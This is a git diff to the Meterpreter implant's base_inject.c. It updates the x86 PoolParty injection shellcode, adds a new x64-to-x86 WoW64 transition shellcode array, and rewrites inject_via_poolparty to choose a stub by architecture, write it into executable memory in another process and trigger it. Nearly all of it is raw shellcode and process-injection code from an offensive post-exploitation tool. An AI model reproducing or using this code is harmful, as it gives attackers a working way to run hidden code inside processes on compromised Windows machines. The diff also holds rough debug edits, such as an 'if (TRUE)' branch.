diff --git a/c/meterpreter/source/metsrv/base_inject.c b/c/meterpreter/source/metsrv/base_inject.c index f55ca883..ce4a7716 100644 --- a/c/meterpreter/source/metsrv/base_inject.c +++ b/c/meterpreter/source/metsrv/base_inject.c @@ -78,19 +78,20 @@ BYTE apc_stub_x64[] = "\xFC\x80\x79\x10\x00\x0F\x85\x13\x01\x00\x00\xC6\x41\x10 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00"; -BYTE poolparty_stub_x86[] = "\xFC\xE9\xBE\x00\x00\x00\x5E\x55\x89\xE5\xE8\x8C\x00\x00\x00\x60" - "\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72" - "\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20" - "\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x57\x8B\x52\x10\x8B\x42\x3C" - "\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4C\x01\xD0\x50\x8B\x48\x18\x8B" - "\x58\x20\x01\xD3\x85\xC9\x74\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF" - "\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B" - "\x7D\x24\x75\xE0\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58" - "\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59" - "\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x83\x5B\xFF\x76\x10\x6A" - "\xFF\x68\x08\x87\x1D\x60\xFF\xD3\x31\xC9\x51\x51\xFF\x76\x08\xFF" - "\x36\x51\x51\x68\x38\x68\x0D\x16\xFF\xD3\x31\xC0\x39\xC0\x74\xFA" - "\xC9\xC2\x0C\x00\xE8\x3D\xFF\xFF\xFF"; +BYTE poolparty_stub_x86[] = "\xFC\xE9\xD2\x00\x00\x00\x5E\x55\x89\xE5\xE8\xA0\x00\x00\x00\x60" + "\x89\xE5\x31\xD2\x8C\xEA\x85\xD2\x75\x06\x64\x8B\x52\x30\xEB\x0C" + "\x31\xD2\x65\x8B\x52\x60\x81\xC2\x00\x10\x00\x00\x8B\x52\x0C\x8B" + "\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" + "\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x57\x8B\x52" + "\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4C\x01\xD0\x50" + "\x8B\x48\x18\x8B\x58\x20\x01\xD3\x85\xC9\x74\x3C\x49\x8B\x34\x8B" + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE0\x58\x8B\x58\x24\x01\xD3\x66\x8B" + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x83\x5B" + "\xFF\x76\x10\x6A\xFF\x68\x08\x87\x1D\x60\xFF\xD3\x31\xC9\x51\x51" + "\xFF\x76\x08\xFF\x36\x51\x51\x68\x38\x68\x0D\x16\xFF\xD3\x31\xC0" + "\x39\xC0\x74\xFA\xC9\xC2\x0C\x00\xE8\x29\xFF\xFF\xFF"; BYTE poolparty_stub_x64[] = "\xFC\xE9\x09\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC8\x00\x00\x00" "\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48" @@ -110,6 +111,26 @@ BYTE poolparty_stub_x64[] = "\xFC\xE9\x09\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC "\x8B\x01\x4C\x8B\x49\x08\x48\x31\xC9\xBA\x00\x00\x10\x00\x51\x51" "\x41\xBA\x38\x68\x0D\x16\xFF\xD5\x31\xC0\x39\xC0\x74\xFA\x90\xE8" "\xF2\xFE\xFF\xFF"; + +BYTE x64tox86[] = "\xFC\xE9\x14\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC8\x00\x00\x00" + "\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48" + "\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A" + "\x4D\x31\xC9\x48\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9" + "\x0D\x41\x01\xC1\xE2\xED\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C" + "\x48\x01\xD0\x66\x81\x78\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00" + "\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40" + "\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6" + "\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0" + "\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40" + "\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0" + "\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58" + "\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A" + "\x48\x8B\x12\xE9\x4F\xFF\xFF\xFF\x5D\x41\xBA\x75\x3F\x47\x32\xFF" + "\xD5\x48\xC7\xC0\xFE\xFF\xFF\xFF\x48\x89\xC1\x48\x89\xF2\x4D\x31" + "\xC0\x4D\x31\xC9\x41\x51\x41\xBA\x13\xBF\xB3\xB9\xFF\xD5\x48\x31" + "\xC9\x48\x31\xD2\x4D\x31\xC0\x4D\x31\xC9\x41\xBA\x6D\xA2\xAF\xF3" + "\xFF\xD5\x48\x31\xC0\x48\x85\xC0\x74\xF8\xE8\xE7\xFE\xFF\xFF\xC3"; + /* * Attempt to gain code execution in the remote process via a call to ntdll!NtQueueApcThread * Note: Windows Server 2008R2 can blue screen if you use APC injection to inject into another sessions csrss.exe @@ -520,7 +541,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW DWORD dwResult = ERROR_SUCCESS; DWORD dwTechnique = MIGRATE_TECHNIQUE_REMOTETHREAD; HANDLE hThread = NULL; - LPVOID lpPoolPartyStub = NULL; + LPVOID lpPoolPartyStub; POOLPARTYCONTEXT ctx = { 0 }; ctx.s.lpStartAddress = lpStartAddress; ctx.p.lpParameter = lpParameter; @@ -531,18 +552,28 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW DWORD dwStubSize = 0; DWORD dwPoolPartyVariant = POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION; + HANDLE hHeap = GetProcessHeap(); + do { - if (dwDestinationArch == dwMeterpreterArch) { - if (dwMeterpreterArch == PROCESS_ARCH_X64) { + if (TRUE) { + if (dwDestinationArch == PROCESS_ARCH_X64) { + dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_x64"); lpStub = &poolparty_stub_x64; dwStubSize = sizeof(poolparty_stub_x64) - 1; - } - else { + }else if (dwMeterpreterArch == PROCESS_ARCH_X86 && !IsWow64Process(GetCurrentProcess(), NULL)) { + dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_x86"); lpStub = &poolparty_stub_x86; dwStubSize = sizeof(poolparty_stub_x86) - 1; } + else { + dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_wow64"); + lpStub = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2); + memcpy(lpStub, x64tox86, sizeof(x64tox86) - 1); + memcpy((LPBYTE)lpStub + sizeof(x64tox86) - 1, poolparty_stub_x86, sizeof(poolparty_stub_x86)); + dwStubSize = sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2; + } hTriggerEvent = CreateEvent(NULL, TRUE, FALSE, NULL); if (!hTriggerEvent) @@ -557,7 +588,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW } lpPoolPartyStub = VirtualAllocEx(hProcess, NULL, dwStubSize + sizeof(POOLPARTYCONTEXT), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); - //dprintf("[INJECT][inject_via_poolparty] ctx [%p] lpStartAddress: %p lpParameter %p hTriggerEvent %p", (LPBYTE) lpPoolPartyStub + dwStubSize, ctx.s.lpStartAddress, ctx.p.lpParameter, ctx.e.hTriggerEvent); + dprintf("[INJECT][inject_via_poolparty] ctx [%p] lpStartAddress: %p lpParameter %p hTriggerEvent %p", (LPBYTE) lpPoolPartyStub + dwStubSize, ctx.s.lpStartAddress, ctx.p.lpParameter, ctx.e.hTriggerEvent); if (!lpPoolPartyStub) { BREAK_WITH_ERROR("[INJECT] inject_via_poolparty: VirtualAllocEx failed!", ERROR_POOLPARTY_GENERIC); } @@ -570,7 +601,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW BREAK_WITH_ERROR("[INJECT] inject_via_poolparty: Cannot write custom shellcode!", ERROR_POOLPARTY_GENERIC); } - if (remote_tp_direct_insertion(hProcess, lpPoolPartyStub, (BYTE*)lpPoolPartyStub + dwStubSize, &hTriggerEvent) == ERROR_SUCCESS) { + if (remote_tp_direct_insertion(hProcess, dwDestinationArch, lpPoolPartyStub, (BYTE*)lpPoolPartyStub + dwStubSize, &hTriggerEvent) == ERROR_SUCCESS) { dprintf("[INJECT] inject_via_poolparty: injectied!"); } else { @@ -787,6 +818,7 @@ DWORD inject_dll_stealth (DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuff return dwResult; } + DWORD inject_dll(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD dwDllLength, LPCSTR reflectiveLoader, LPVOID lpArg, SIZE_T stArgSize) { DWORD injected = 1; if (support_stealth_injection(dwDestinationArch)) { @@ -796,4 +828,4 @@ DWORD inject_dll(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD injected = inject_dll_legacy(dwPid, dwDestinationArch, lpDllBuffer, dwDllLength, reflectiveLoader, lpArg, stArgSize); } return injected; -} +} \ No newline at end of file